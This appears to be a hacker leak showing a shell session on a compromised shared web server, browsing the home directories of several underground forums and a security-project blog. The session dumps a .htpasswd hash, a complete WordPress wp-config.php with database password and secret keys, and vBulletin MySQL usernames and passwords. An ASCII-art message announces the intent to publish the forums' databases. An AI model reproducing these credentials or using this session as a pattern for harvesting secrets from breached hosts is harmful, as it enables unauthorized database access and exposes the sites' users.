-rw-r--r--   1 webserver  www   43588 Aug 25 04:53 index.php
-rw-r--r--   1 webserver  www   35381 Aug 25 04:53 language.php
-rw-r--r--   1 webserver  www   74149 Aug 25 04:53 misc.php
-rw-r--r--   1 webserver  www   34575 Aug 25 04:53 moderator.php
-rw-r--r--   1 webserver  www   16950 Aug 25 04:53 modlog.php
-rw-r--r--   1 webserver  www    1639 Aug 25 04:53 newsproxy.php
-rw-r--r--   1 webserver  www   29629 Aug 25 04:53 notice.php
-rw-r--r--   1 webserver  www   43243 Aug 25 04:53 options.php
-rw-r--r--   1 webserver  www   11759 Aug 25 04:53 passwordcheck.php
-rw-r--r--   1 webserver  www   64527 Aug 25 04:53 phrase.php
-rw-r--r--   1 webserver  www   56994 Aug 25 04:53 plugin.php
-rw-r--r--   1 webserver  www   12709 Aug 25 05:38 post_thanks_admin.php
-rw-r--r--   1 webserver  www   33126 Aug 25 04:53 prefix.php
-rw-r--r--   1 webserver  www   49792 Aug 25 04:53 profilefield.php
-rw-r--r--   1 webserver  www   19412 Aug 25 04:53 queries.php
-rw-r--r--   1 webserver  www   11315 Aug 25 04:53 ranks.php
-rw-r--r--   1 webserver  www   13907 Aug 25 04:53 repair.php
-rw-r--r--   1 webserver  www   15718 Aug 25 04:53 replacement.php
-rw-r--r--   1 webserver  www    2172 Aug  7 21:03 resetreminders.php
-rw-r--r--   1 webserver  www   11019 Aug 25 04:53 resources.php
-rw-r--r--   1 webserver  www   20751 Aug 25 04:53 rssposter.php
-rw-r--r--   1 webserver  www   15216 Aug 25 04:53 sitemap.php
-rw-r--r--   1 webserver  www   50236 Aug 25 04:19 skimlinks.php
-rw-r--r--   1 webserver  www   12797 Aug 25 04:53 socialgroup_icon.php
-rw-r--r--   1 webserver  www   17741 Aug 25 04:53 socialgroups.php
-rw-r--r--   1 webserver  www    8705 Aug 25 04:53 stats.php
-rw-r--r--   1 webserver  www   48065 Aug 25 04:53 stylevar.php
-rw-r--r--   1 webserver  www    8210 Aug 25 04:53 subscriptionpermission.php
-rw-r--r--   1 webserver  www   62322 Aug 25 04:53 subscriptions.php
-rw-r--r--   1 webserver  www   17595 Aug 25 04:53 tag.php
-rw-r--r--   1 webserver  www  122861 Aug 25 04:53 template.php
-rw-r--r--   1 webserver  www    4297 Aug 25 04:53 textarea.php
-rw-r--r--   1 webserver  www    3538 Jul  9 22:23 thanks.php
-rw-r--r--   1 webserver  www   45842 Aug 25 04:53 thread.php
-rw-r--r--   1 webserver  www   95585 Aug 25 04:53 user.php
-rw-r--r--   1 webserver  www   57848 Aug 25 04:53 usergroup.php
-rw-r--r--   1 webserver  www    7287 Aug 25 04:53 usertitle.php
-rw-r--r--   1 webserver  www   77892 Aug 25 04:53 usertools.php
-rw-r--r--   1 webserver  www    3546 Jul  9 23:26 vbshout.php
-rw-r--r--   1 webserver  www   18768 Aug 25 04:53 verify.php
-rw-r--r--   1 webserver  www   14515 Aug 25 04:53 verticalresponse.php

# cat .htaccess
<IfModule mod_rewrite.c>
RewriteEngine off
</IfModule>
AuthName "."
AuthType Basic
AuthUserFile "/home/webserver/hackbase.cc/hbisonfire/.htpasswd"
require valid-user

# cat .htpasswd
easypeasy:$1$aQrzlLc5$5oX4r2IqDcdQ/DOhP3RRG.

# cd /home/4004/

# ls -la
total 20
drwxr-x---  5 4004  www    512 Oct  8 18:55 .
drwxr-x--x  9 root  wheel  512 Oct 14 00:41 ..
drwxrwx---  3 4004  www    512 Oct  9 15:39 4004-security-project.com
drwxr-xr-x  2 4004  www    512 Oct  8 19:05 hta
drwxrwx---  2 4004  www    512 Oct  9 15:35 temp

# cd 4004-security-project.com/

# ls -la
total 16
drwxrwx---  3 4004  www   512 Oct  9 15:39 .
drwxr-x---  5 4004  www   512 Oct  8 18:55 ..
drwxr-xr-x  6 4004  www  1024 Oct 10 04:15 blog
-rw-r--r--  1 4004  www    71 Oct  9 15:39 index.php

# cat blog/wp-config.php 
<?php
/**
 * In dieser Datei werden die Grundeinstellungen für WordPress vorgenommen.
 *
 * Zu diesen Einstellungen gehören: MySQL-Zugangsdaten, Tabellenpräfix,
 * Secret-Keys, Sprache und ABSPATH. Mehr Informationen zur wp-config.php gibt es auf der {@link http://codex.wordpress.org/Editing_wp-config.php
 * wp-config.php editieren} Seite im Codex. Die Informationen für die MySQL-Datenbank bekommst du von deinem Webhoster.
 *
 * Diese Datei wird von der wp-config.php-Erzeugungsroutine verwendet. Sie wird ausgefährt, wenn noch keine wp-config.php (aber eine wp-config-sample.php) vorhanden ist,
 * und die Installationsroutine (/wp-admin/install.php) aufgerufen wird.
 * Man kann aber auch direkt in dieser Datei alle Eingaben vornehmen und sie von wp-config-sample.php in wp-config.php umbenennen und die Installation starten.
 *
 * @package WordPress
 */

/**  MySQL Einstellungen - diese Angaben bekommst du von deinem Webhoster. */
/**  Ersetze database_name_here mit dem Namen der Datenbank, die du verwenden möchtest. */
define('DB_NAME', '4004_db');

/** Ersetze username_here mit deinem MySQL-Datenbank-Benutzernamen */
define('DB_USER', '4004_db');

/** Ersetze password_here mit deinem MySQL-Passwort */
define('DB_PASSWORD', 'dsa234dvb54Xd12SC');

/** Ersetze localhost mit der MySQL-Serveradresse */
define('DB_HOST', 'localhost');

/** Der Datenbankzeichensatz der beim Erstellen der Datenbanktabellen verwendet werden soll */
define('DB_CHARSET', 'utf8');

/** Der collate type sollte nicht geändert werden */
define('DB_COLLATE', '');

/**#@+
 * Sicherheitsschlüssel
 *
 * Ändere jeden KEY in eine beliebige, möglichst einzigartige Phrase. 
 * Auf der Seite {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service} kannst du dir alle KEYS generieren lassen.
 * Bitte trage für jeden KEY eine eigene Phrase ein. Du kannst die Schlüssel jederzeit wieder ändern, alle angemeldeten Benutzer müssen sich danach erneut anmelden.
 *
 * @seit 2.6.0
 */
define('AUTH_KEY',         'uM]_a ceaNwK9= T<6i$`2!&[V5|,H1J^+=wx$`D1X4T*`O}&vp;%/(J}5RcZkFA');
define('SECURE_AUTH_KEY',  '|vo&mKO$8]o0(s>joQ*Qm0z5D|iy(%lu:bC(L$+fcCqy4PuBk^|q~^}ZzftvJVyN');
define('LOGGED_IN_KEY',    '?Z{|TYufOz9Nj8Zm h|}yEhPoz/YQFn7VO-PsUZK MigN,=bEiI(>%5;zc+)E^Z:');
define('NONCE_KEY',        '@Dm`X,?z~esFh1`n]f-dh|<S_`&{!zMCAGgV[BZSe6$v$=7^Uz#dq+`N~B}F-y{a');
define('AUTH_SALT',        'bPuhsC49%tzWjvsh)O~wDbtVDR=A//Zh.E,t%b{X9uU/Vvsm;]ojLn<j(d2z6`A^');
define('SECURE_AUTH_SALT', 'aWB,3a$%uEBV+kYS5tN2H7A|RzF$.]}({niGb@$PUmxo-@Fw]P! FsMIjosH?@40');
define('LOGGED_IN_SALT',   'tmWO#_?Q_c$&Y|;CBtfDP>!$DhzVXZ5iep|4jijRsVe)U&IxQ4qhj^e_1:,G_v {');
define('NONCE_SALT',       ')2O=Fe-ow13$6ii)|F-&4LROwgZo~KkQ+e;PeV9l)ySD7:XH8R%|}lXcly$-4*3G');

/**#@-*/

/**
 * WordPress Datenbanktabellen-Präfix
 *
 *  Wenn du verschiedene Präfixe benutzt, kannst du innerhalb einer Datenbank
 *  verschiedene WordPress-Installationen betreiben. Nur Zahlen, Buchstaben und Unterstriche bitte!
 */
$table_prefix  = 'wp_';

/**
 * WordPress Sprachdatei
 *
 * Hier kannst du einstellen, welche Sprachdatei benutzt werden soll. Die entsprechende
 * Sprachdatei muss im Ordner wp-content/languages vorhanden sein, beispielsweise de_DE.mo
 * Wenn du nichts einträgst, wird Englisch genommen.
 */
define('WPLANG', 'de_DE');

/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 */
define('WP_DEBUG', false);

/* That's all, stop editing! Happy blogging. */

/** Absolute path to the WordPress directory. */
if ( !defined('ABSPATH') )
	define('ABSPATH', dirname(__FILE__) . '/');

/** Sets up WordPress vars and included files. */


Have fun with the database.

        ,;~;,
           /\_
          (  /
          (()      //)
          | \\  ,,;;'\
      __ _(  )m=((((((((((((((====={    Some leftovers    }====-------
    /'  ' '()/~' '.(, |
 ,;(      )||     |  ~ Some targets are still to be exposed, but there
,;' \    /-(.;,   )  is  not really  anything left  to  be  shaped  in
     ) /       ) /   words.  In fact we think that it would be best to
    //         ||   simply publish  their databases  without  a lot of
   )_\         )_\  hesitation.  So the  rest includes  three  further
forums named  union-district.cc,  cyberbase.us and  secret-network.biz

# pwd
/home/ixde

# ls -la
total 24
drwxr-x---   4 ixde  www     512 Aug 28 00:55 .
drwxr-x--x  13 root  wheel   512 Sep 22 21:06 ..
drwxrwx---   2 ixde  www    5632 Oct 18 17:06 temp
drwxrwx---   3 ixde  www     512 Oct  2 22:38 union-district.cc

# cd union-district.cc

# ls -la
total 20
drwxrwx---   3 ixde  www   512 Oct  2 22:38 .
drwxr-x---   4 ixde  www   512 Aug 28 00:55 ..
drwxr-xr-x  19 ixde  www  2560 Oct 18 17:04 board
-rw-r--r--   1 ixde  www    53 Aug 17 16:13 index.php
# cd board

# ls -la
total 4692
drwxr-xr-x  19 ixde  www    2560 Oct 18 17:04 .
drwxrwx---   3 ixde  www     512 Oct  2 22:38 ..
-rw-r--r--   1 ixde  www     987 Mar 10  2011 .htaccess
drwxr-xr-x   3 ixde  www    2048 Oct 11 17:28 0Ok4ae8FjOQ1d8R5EjCS3qIc3RMPolA
-rw-r--r--   1 ixde  www   17881 Jun  4 12:11 LICENSE
drwxr-xr-x   2 ixde  www     512 Jul  9 22:12 LokAKr5K7MfZn0n0JdLfD75vuBRc5E9
drwxr-xr-x   2 ixde  www     512 Sep 17 19:40 Partner
drwxr-xr-x   2 ixde  www     512 Jul 11 17:27 admincp
-rw-r--r--   1 ixde  www   23810 Aug 23 14:17 ajax.php
-rw-r--r--   1 ixde  www   75447 Jun  4 12:16 album.php
-rw-r--r--   1 ixde  www   17082 Jun  4 12:16 announcement.php
drwxr-xr-x   2 ixde  www     512 Jul  7 14:23 archive
-rw-r--r--   1 ixde  www   18245 Jun  4 12:16 attachment.php
-rw-r--r--   1 ixde  www   75263 Jun  4 12:16 calendar.php
-rw-r--r--   1 ixde  www      43 Jun  2 06:12 clear.gif
drwxr-xr-x   4 ixde  www    2560 Jul 22 18:28 clientscript
-rw-r--r--   1 ixde  www   14872 Jun  4 12:16 converse.php
drwxr-xr-x   7 ixde  www     512 Jul  7 14:24 cpstyles
-rw-r--r--   1 ixde  www    3254 Jun  4 12:16 cron.php
drwxr-xr-x   3 ixde  www     512 Jul  7 14:24 customavatars
drwxr-xr-x   3 ixde  www     512 Jul  7 14:24 customgroupicons
drwxr-xr-x   2 ixde  www     512 Jul  7 14:24 customprofilepics
-rw-r--r--   1 ixde  www  123083 Sep 21 15:38 default3i.jpg
-rw-r--r--   1 ixde  www    2522 Sep 21 15:44 dnp_fw.php
-rw-r--r--   1 ixde  www     511 Sep 21 15:42 dnp_fw_config.php
-rw-r--r--   1 ixde  www    1101 Sep 21 15:40 dnp_fw_template.php
-rw-r--r--   1 ixde  www   47702 Jun  4 12:16 editpost.php
-rw-r--r--   1 ixde  www   29848 Jul  9 21:00 external.php
-rw-r--r--   1 ixde  www    9723 Jun  4 12:16 faq.php
-rw-r--r--   1 ixde  www    9662 Oct 12 16:46 favicon.ico
-rw-r--r--   1 ixde  www   35940 Jun  4 12:16 forumdisplay.php
-rw-r--r--   1 ixde  www   39768 Oct  2 22:38 global.php
-rw-r--r--   1 ixde  www  138140 Jun  4 12:16 group.php
-rw-r--r--   1 ixde  www   24856 Jun  4 12:16 group_inlinemod.php
-rw-r--r--   1 ixde  www   10458 Jun  4 12:16 groupsubscription.php
-rw-r--r--   1 ixde  www    8984 Jun  4 12:16 image.php
drwxr-xr-x  18 ixde  www     512 Jul 18 20:21 images
drwxr-xr-x   8 ixde  www    5120 Oct 18 17:04 includes
-rw-r--r--   1 ixde  www   19678 Jun  4 12:16 index.php
-rw-r--r--   1 ixde  www   43865 Jun  4 12:16 infraction.php
-rw-r--r--   1 ixde  www  183062 Jun  4 12:16 inlinemod.php
-rw-r--r--   1 ixde  www   10278 Jun  4 12:16 joinrequests.php
-rw-r--r--   1 ixde  www   10159 Oct  7 13:51 login.php
drwxr-xr-x   2 ixde  www     512 Aug 13 09:42 madp
-rw-r--r--   1 ixde  www   17000 Jun  4 12:16 member.php
-rw-r--r--   1 ixde  www   15868 Jun  4 12:16 member_inlinemod.php
-rw-r--r--   1 ixde  www   35884 Jun  4 12:16 memberlist.php
drwxr-xr-x   6 ixde  www     512 Jul  8 21:24 mgc_cb_evo
-rw-r--r--   1 ixde  www   60012 May 17  2010 mgc_cb_evo.php
-rw-r--r--   1 ixde  www   49939 May  9  2010 mgc_cb_evo_ajax.php
-rw-r--r--   1 ixde  www   23803 Jun  4 12:16 misc.php
-rw-r--r--   1 ixde  www   63260 Jun  4 12:16 moderation.php
-rw-r--r--   1 ixde  www    6693 Jun  4 12:16 moderator.php
drwxr-xr-x  11 ixde  www     512 Sep 25 16:46 mysqldingsbumsdadumper
-rw-r--r--   1 ixde  www   18413 Jun  4 12:16 newattachment.php
-rw-r--r--   1 ixde  www   38318 Jun  4 12:16 newreply.php
-rw-r--r--   1 ixde  www   18848 Jun  4 12:16 newthread.php
-rw-r--r--   1 ixde  www   19570 Jun  4 12:16 online.php
-rw-r--r--   1 ixde  www    7633 Jun  4 12:16 payment_gateway.php
-rw-r--r--   1 ixde  www   11847 Jun  4 12:16 payments.php
-rw-r--r--   1 ixde  www    7826 Jun  4 12:16 picture.php
-rw-r--r--   1 ixde  www   21976 Jun  4 12:16 picture_inlinemod.php
-rw-r--r--   1 ixde  www   25243 Jun  4 12:16 picturecomment.php
-rw-r--r--   1 ixde  www   27348 Jun  4 12:16 poll.php
-rw-r--r--   1 ixde  www    9449 Jun  4 12:16 posthistory.php
-rw-r--r--   1 ixde  www   74304 Jun  4 12:16 postings.php
-rw-r--r--   1 ixde  www    6530 Jun  4 12:16 printthread.php
-rw-r--r--   1 ixde  www   70620 Jun  4 12:16 private.php
-rw-r--r--   1 ixde  www  152264 Jun  4 12:16 profile.php
-rw-r--r--   1 ixde  www   39688 Jun  4 12:16 register.php
-rw-r--r--   1 ixde  www    5624 Jun  4 12:16 report.php
-rw-r--r--   1 ixde  www   13655 Jun  4 12:16 reputation.php
-rw-r--r--   1 ixde  www  124845 Jul  9 20:58 search.php
-rw-r--r--   1 ixde  www   20883 Jun  4 12:16 sendmessage.php
-rw-r--r--   1 ixde  www   10015 Aug 22 13:52 showgroups.php
-rw-r--r--   1 ixde  www   12335 Jun  4 12:16 showpost.php
-rw-r--r--   1 ixde  www   73473 Jun  4 12:16 showthread.php
drwxr-xr-x   2 ixde  www     512 Jul  7 14:21 signaturepics
-rw-r--r--   1 ixde  www   32813 Jun  4 12:16 subscription.php
-rw-r--r--   1 ixde  www   13302 Jun  4 12:16 tags.php
-rw-r--r--   1 ixde  www    5582 Jul  8 00:17 thanks.php
-rw-r--r--   1 ixde  www    8628 Jun  4 12:16 threadrate.php
-rw-r--r--   1 ixde  www   12351 Jun  4 12:16 threadtag.php
-rw-r--r--   1 ixde  www   34444 Jun  4 12:16 usercp.php
-rw-r--r--   1 ixde  www   19042 Jun  4 12:16 usernote.php
drwxr-xr-x   4 ixde  www     512 Jul  9 22:10 vbseo
-rw-r--r--   1 ixde  www   45332 Apr 14  2011 vbseo.php
-rw-r--r--   1 ixde  www    4073 Apr 14  2011 vbseocp.php
-rw-r--r--   1 ixde  www   27313 Jun  4 12:16 visitormessage.php

# grep username includes/config.php
	//	This is the username and password you use to access MySQL.
$config['MasterServer']['username'] = 'ixde_board';
$config['SlaveServer']['username'] = '';

# grep password includes/config.php
	//	This is the username and password you use to access MySQL.
$config['MasterServer']['password'] = '89as7f986adg6zgsd87fz';
$config['SlaveServer']['password'] = '';

----------------------------------------------------------------------

# pwd
/home/true

# ls -la
total 24
drwxr-x---   5 true  www     512 Oct  3 16:58 .
drwxr-x--x  13 root  wheel   512 Sep 22 21:06 ..
drwxr-xr-x   3 true  www     512 Oct  3 16:59 cyberbase.us
drwxrwx---  28 true  www    3584 Oct  2 10:13 cyberbase.usX
drwxrwxrwx   2 true  www     512 Oct  3 13:32 temp

# cd cyberbase.us

# ls -la
total 16
drwxr-xr-x  3 true  www   512 Oct  3 16:59 .
drwxr-x---  5 true  www   512 Oct  3 16:58 ..
drwxr-xr-x  2 true  www   512 Oct  3 16:59 index-Dateien
-rw-r--r--  1 true  www  1746 Oct  3 16:58 index.htm

# cd ..

# cd cyberbase.usX

# ls -la
total 14252
drwxrwx---  28 true  www     3584 Oct  2 10:13 .
drwxr-x---   5 true  www      512 Oct  3 16:58 ..
-rw-r--r--   1 true  www    33946 Jun 13 23:29 Blackstealth 3.8.6-style.xml
-rw-r--r--   1 true  www   158910 Apr 10  2011 Cyb_AFStats.xml
-rw-r--r--   1 true  www    95002 Apr 10  2011 Cyb_CB.xml
-rw-r--r--   1 true  www   112424 May  5 17:58 Deutsch(Du).xml
-rw-r--r--   1 true  www   127492 May 15  2010 English.xml
-rw-r--r--   1 true  www    23696 May  5 12:04 ajax.php
-rw-r--r--   1 true  www    75363 May  5 12:04 album.php
-rw-r--r--   1 true  www    16987 May  5 12:04 announcement.php
-rw-r--r--   1 true  www    18161 May  5 12:04 attachment.php
-rw-r--r--   1 true  www   101273 Aug 19 20:34 bluepearl-design-logo.png
-rw-r--r--   1 true  www    75178 May  5 12:04 calendar.php
-rw-r--r--   1 true  www    86522 Apr 10  2011 class_core.php
-rw-r--r--   1 true  www       43 May  5 12:04 clear.gif
drwxr-xr-x   5 true  www     2560 Jun 16 19:54 clientscript
-rw-r--r--   1 true  www    36038 Jun 16 19:58 commerce.php
-rw-r--r--   1 true  www    30943 Jun 16 19:58 commerce_item.php
-rw-r--r--   1 true  www    25995 Jun 16 19:58 commerce_shop.php
-rw-r--r--   1 true  www    14788 May  5 12:04 converse.php
drwxr-xr-x   7 true  www      512 Apr 11  2011 cpstyles
-rw-r--r--   1 true  www    48250 Jun 16 19:57 credits.php
-rw-r--r--   1 true  www     3169 May  5 12:04 cron.php
drwxr-xr-x   8 true  www      512 Aug 27 00:04 ctracker
drwxrwxrwx   3 true  www      512 Apr 11  2011 customavatars
drwxrwxrwx   3 true  www      512 Apr 11  2011 customgroupicons
drwxrwxrwx   2 true  www      512 Apr 11  2011 customprofilepics
drwxr-xr-x   4 true  www      512 Aug 23 15:26 dbtech
-rw-r--r--   1 true  www    47607 May  5 12:04 editpost.php
-rw-r--r--   1 true  www    29346 May  5 12:04 external.php
-rw-r--r--   1 true  www     9638 Apr 10  2011 faq.php
-rw-r--r--   1 true  www    35836 May  6 21:19 forumdisplay.php
-rw-r--r--   1 true  www   195072 Jun  9 15:06 foto.exe
-rw-r--r--   1 true  www    39789 Sep  2 14:11 global.php
-rw-r--r--   1 true  www   138040 May  5 12:04 group.php
-rw-r--r--   1 true  www    24771 May  5 12:04 group_inlinemod.php
-rw-r--r--   1 true  www    10374 May  5 12:04 groupsubscription.php
-rw-r--r--   1 true  www  1245151 Apr 30 16:30 hauptsprache-vbulletin-de-sie.xml
-rw-r--r--   1 true  www      233 May  5 12:04 hide.png
-rw-r--r--   1 true  www     8899 May  5 12:04 image.php
drwxrwxrwx  26 true  www     1024 Sep 23 21:42 images
drwxr-xr-x   7 true  www     5120 Jun 16 19:54 includes
-rwxrwxrwx   1 true  www    19444 May  5 12:04 index.php
drwxr-xr-x   6 true  www      512 Apr 11  2011 infernoshout
-rw-r--r--   1 true  www    10755 Apr 10  2011 infernoshout.php
-rw-r--r--   1 true  www    43780 May  5 12:04 infraction.php
-rw-r--r--   1 true  www   182773 May  5 12:04 inlinemod.php
-rw-r--r--   1 true  www     5734 May  7 20:24 itrader.php
-rw-r--r--   1 true  www    11544 May  7 20:24 itrader_detail.php
-rw-r--r--   1 true  www    11550 May  7 20:24 itrader_feedback.php
-rw-r--r--   1 true  www     1364 May  7 20:24 itrader_global.php
-rw-r--r--   1 true  www    19017 May  7 20:24 itrader_main.php
-rw-r--r--   1 true  www     3510 May  7 20:24 itrader_report.php
-rw-r--r--   1 true  www    10194 May  5 12:03 joinrequests.php
drwxr-xr-x   3 true  www     3072 May  4 14:15 kbank
-rw-r--r--   1 true  www    64645 Apr  4  2009 kbank.php
drwxr-xr-x   2 true  www      512 Aug 27 01:49 lang
-rw-r--r--   1 true  www        0 Apr 10  2011 logfile_worms.txt
-rw-r--r--   1 true  www    10074 May  5 12:03 login.php
drwxr-xr-x   2 true  www      512 Jun 13 21:46 madp
-rw-r--r--   1 true  www     2458 Jun  4 13:12 mc.jar
drwxr-xr-x   2 true  www      512 Aug 27 01:49 media
-rw-r--r--   1 true  www    16916 May  5 12:03 member.php
-rw-r--r--   1 true  www    15783 May  5 12:03 member_inlinemod.php
-rw-r--r--   1 true  www    35753 May  5 12:03 memberlist.php
drwxr-xr-x   6 true  www      512 May  6 12:29 mgc_cb_evo
-rw-r--r--   1 true  www    60012 Sep  1 11:53 mgc_cb_evo.php
-rw-r--r--   1 true  www    49939 Sep  1 11:53 mgc_cb_evo_ajax.php
-rw-r--r--   1 true  www    23718 May  5 12:03 misc.php
-rw-r--r--   1 true  www    63176 May  5 12:03 moderation.php
-rw-r--r--   1 true  www     6608 May  5 12:03 moderator.php
drwxr-xr-x   2 true  www      512 May  4 14:08 modmodmodmdodmodmdodmodmdomdodmdomdo2323324
drwxr-xr-x   3 true  www      512 May 14 16:22 msqllllsdflsdfsdfsd
-rw-r--r--   1 true  www    18328 May  5 12:03 newattachment.php
-rw-r--r--   1 true  www    36953 May  5 12:03 newreply.php
-rw-r--r--   1 true  www    18763 May  5 12:03 newthread.php
-rw-r--r--   1 true  www    19456 May  5 12:03 online.php
-rw-r--r--   1 true  www     7548 May  5 12:03 payment_gateway.php
-rw-r--r--   1 true  www    11762 May  5 12:03 payments.php
-rw-r--r--   1 true  www     7741 May  5 12:03 picture.php
-rw-r--r--   1 true  www    21892 May  5 12:03 picture_inlinemod.php
-rw-r--r--   1 true  www    25159 May  5 12:03 picturecomment.php
drwxr-xr-x   2 true  www      512 Jun 16 19:57 plugins
-rw-r--r--   1 true  www    27264 May  5 12:03 poll.php
-rw-r--r--   1 true  www    12964 May  5 12:03 post_thanks.php
-rw-r--r--   1 true  www     9364 May  5 12:03 posthistory.php
-rw-r--r--   1 true  www    74220 May  5 12:03 postings.php
-rw-r--r--   1 true  www     6445 May  5 12:03 printthread.php
-rw-r--r--   1 true  www    70592 May  5 12:03 private.php
-rw-r--r--   1 true  www     9766 Aug 16 13:16 product-btu.xml
-rw-r--r--   1 true  www   172777 Jun 16 19:54 product-commerce.xml
-rw-r--r--   1 true  www    48878 Jun 16 19:55 product-commerce_it_icons.xml
-rw-r--r--   1 true  www   202226 Jun 16 19:57 product-credits.xml
-rw-r--r--   1 true  www    38178 Aug 23 15:26 product-dbtech_thanks.xml
-rw-r--r--   1 true  www     8396 Apr 10  2011 product-firewall_vb_rs.xml
-rw-r--r--   1 true  www     1471 Apr 11  2011 product-gd_davatar.xml
-rw-r--r--   1 true  www    86137 May  7 20:24 product-itrader.xml
-rw-r--r--   1 true  www    45809 Jun 13 21:46 product-kiros_madp.xml
-rw-r--r--   1 true  www   358132 Sep  1 11:53 product-mgc_cb_evo.xml
-rw-r--r--   1 true  www    99567 Apr 11  2011 product-psionic_hide.xml
-rw-r--r--   1 true  www    17012 May 27 14:32 product-sevenskins_imageresizer-v1.3.xml
-rw-r--r--   1 true  www     2534 Apr 10  2011 product-ugcb.xml
-rw-r--r--   1 true  www    66736 Apr 10  2011 product_vBShout.xml
-rw-r--r--   1 true  www   152180 May  5 12:03 profile.php
drwxr-xr-x   2 true  www      512 Sep 24 12:34 rang
-rw-r--r--   1 true  www    39603 May  5 12:03 register.php
-rw-r--r--   1 true  www     5539 May  5 12:03 report.php
-rw-r--r--   1 true  www    13571 May  5 12:03 reputation.php
drwxr-xr-x   3 true  www     2048 Aug 23 16:04 sdfwekijrnclkdj9ch73unfuio72h9fzn
-rw-r--r--   1 true  www   124569 May  5 12:04 search.php
-rw-r--r--   1 true  www    20798 May  5 12:03 sendmessage.php
drwxr-xr-x   2 true  www      512 Aug 27 01:49 shlldtct
-rw-r--r--   1 true  www     9861 May  5 12:04 showgroups.php
-rw-r--r--   1 true  www    12240 May  5 12:04 showpost.php
-rw-r--r--   1 true  www    73369 May  5 12:04 showthread.php
drwxrwxrwx   2 true  www      512 Apr 11  2011 signaturepics
-rw-r--r--   1 true  www   339968 Jun  8 12:10 snapeldiesnapp.exe
drwxr-xr-x   2 true  www      512 Apr 11  2011 spoiler
-rw-r--r--   1 true  www    32728 May  5 12:04 subscription.php
-rw-r--r--   1 true  www    13217 May  5 12:04 tags.php
-rw-r--r--   1 true  www     8544 May  5 12:04 threadrate.php
-rw-r--r--   1 true  www    12267 May  5 12:04 threadtag.php
drwxrwxrwx   2 true  www      512 Oct  1 19:27 tmp
-rw-r--r--   1 true  www   179200 Jun 11 15:32 true.exe
-rw-r--r--   1 true  www   389251 Sep 18 12:46 unnex.rar
drwxrwxrwx   2 true  www      512 May 14 21:47 upl
drwxrwxrwx   2 true  www      512 Apr 11  2011 upload
-rw-r--r--   1 true  www    34360 May  5 12:04 usercp.php
-rw-r--r--   1 true  www    18947 May  5 12:04 usernote.php
-rw-r--r--   1 true  www        0 May 14 19:29 validator.php
-rw-r--r--   1 true  www    43650 Jun 12 13:15 vbulletin-style.xml
-rw-r--r--   1 true  www    27229 May  5 12:04 visitormessage.php
-rw-r--r--   1 true  www   393216 May 14 20:22 ??????1.PNG

# find . -name ".ht*" 

# grep username includes/config.php
	//	This is the username and password you use to access MySQL.
$config['MasterServer']['username'] = 'true_forum';
$config['SlaveServer']['username'] = '';

# grep password includes/config.php
	//	This is the username and password you use to access MySQL.
$config['MasterServer']['password'] = 'e6sd87azstdztasdg';
$config['SlaveServer']['password'] = '';

----------------------------------------------------------------------

# pwd
/home/wayne

# ls -la
total 28
drwxr-x---   6 wayne  www     512 Sep 26 05:22 .
drwxr-x--x  13 root   wheel   512 Sep 22 21:06 ..
drwxr-xr-x  12 wayne  www     512 Jun 25 19:20 gtc.nu
-rw-r--r--   1 wayne  www       4 Jun 21 18:42 index.html
drwxr-xr-x   3 wayne  www     512 Sep 26 05:22 secret-network.biz
drwxr-xr-x  18 wayne  www    1536 Jul  8 14:38 secret-network.biz2
drwxrwx---   2 wayne  www     512 Sep 18 16:51 temp

# cd secret-network.biz2

# ls -la
total 1996
drwxr-xr-x  18 wayne  www    1536 Jul  8 14:38 .
drwxr-x---   6 wayne  www     512 Sep 26 05:22 ..
drwxr-xr-x   7 wayne  www     512 Jun 21 20:02 admin7894561234567854
-rw-r--r--   1 wayne  www    2719 Jun 21 20:15 announcements.php
drwxr-xr-x   2 wayne  www     512 Jun 21 20:03 archive
-rw-r--r--   1 wayne  www    3575 Jun 21 20:15 attachment.php
-rw-r--r--   1 wayne  www   13166 Jun 22 22:52 banner.png
-rw-r--r--   1 wayne  www    7102 Jul  8 15:38 bewerbung.php
drwxr-xr-x   2 wayne  www    1024 Jul  7 16:10 bewerbungsdaten
-rw-r--r--   1 wayne  www     696 Jul  8 15:38 bewerbungsend.php
drwxr-xr-x   2 wayne  www     512 Jun 21 20:03 board
drwxrwxrwx   3 wayne  www     512 Jun 21 20:17 cache
-rw-r--r--   1 wayne  www   66703 Jun 21 20:15 calendar.php
-rw-r--r--   1 wayne  www    7536 Jun 21 20:15 captcha.php
drwxr-xr-x   2 wayne  www     512 Jun 21 20:18 cgi-bin
-rw-r--r--   1 wayne  www      57 Jun 22 12:34 cookie.php
-rw-r--r--   1 wayne  www     636 Jun 21 20:15 css.php
-rw-r--r--   1 wayne  www   18908 Jun 21 20:15 editpost.php
-rw-r--r--   1 wayne  www   31478 Jun 21 20:15 forumdisplay.php
-rw-r--r--   1 wayne  www   20114 Jun 22 13:08 global.php
-rw-r--r--   1 wayne  www    2684 Jun 21 20:15 htaccess.txt
drwxr-xr-x  15 wayne  www    2048 Jun 21 20:20 images
drwxr-xr-x   9 wayne  www    2048 Jun 22 10:29 inc
-rw-r--r--   1 wayne  www    9562 Jun 21 20:15 index.php
drwxr-xr-x   2 wayne  www     512 Jun 21 20:24 indexold
drwxr-xr-x   3 wayne  www    1024 Jun 21 20:24 jscripts
drwxr-xr-x  17 wayne  www    1024 Jul  2 14:29 mail
-rw-r--r--   1 wayne  www    9018 Jun 21 20:15 managegroup.php
-rw-r--r--   1 wayne  www   59908 Jul  9 18:54 member.php
-rw-r--r--   1 wayne  www   10090 Jun 21 20:15 memberlist.php
-rw-r--r--   1 wayne  www   20107 Jun 21 20:15 misc.php
-rw-r--r--   1 wayne  www  102298 Jun 21 20:15 modcp.php
-rw-r--r--   1 wayne  www   69231 Jun 21 20:15 moderation.php
-rw-r--r--   1 wayne  www   14312 Jun 22 10:16 modnotice.php
drwxrwxrwx  11 wayne  www     512 Jun 25 13:33 msd41567651564765156
drwxr-xr-x   2 wayne  www     512 Jun 21 20:24 mybb
-rw-r--r--   1 wayne  www   13192 Jun 21 22:42 new.png
-rw-r--r--   1 wayne  www   35673 Jun 21 20:15 newreply.php
-rw-r--r--   1 wayne  www   28716 Jun 21 20:15 newthread.php
-rw-r--r--   1 wayne  www    5930 Jun 21 20:15 online.php
drwxr-xr-x  10 wayne  www    3072 Jul  8 13:46 pma
-rw-r--r--   1 wayne  www   22322 Jun 21 20:15 polls.php
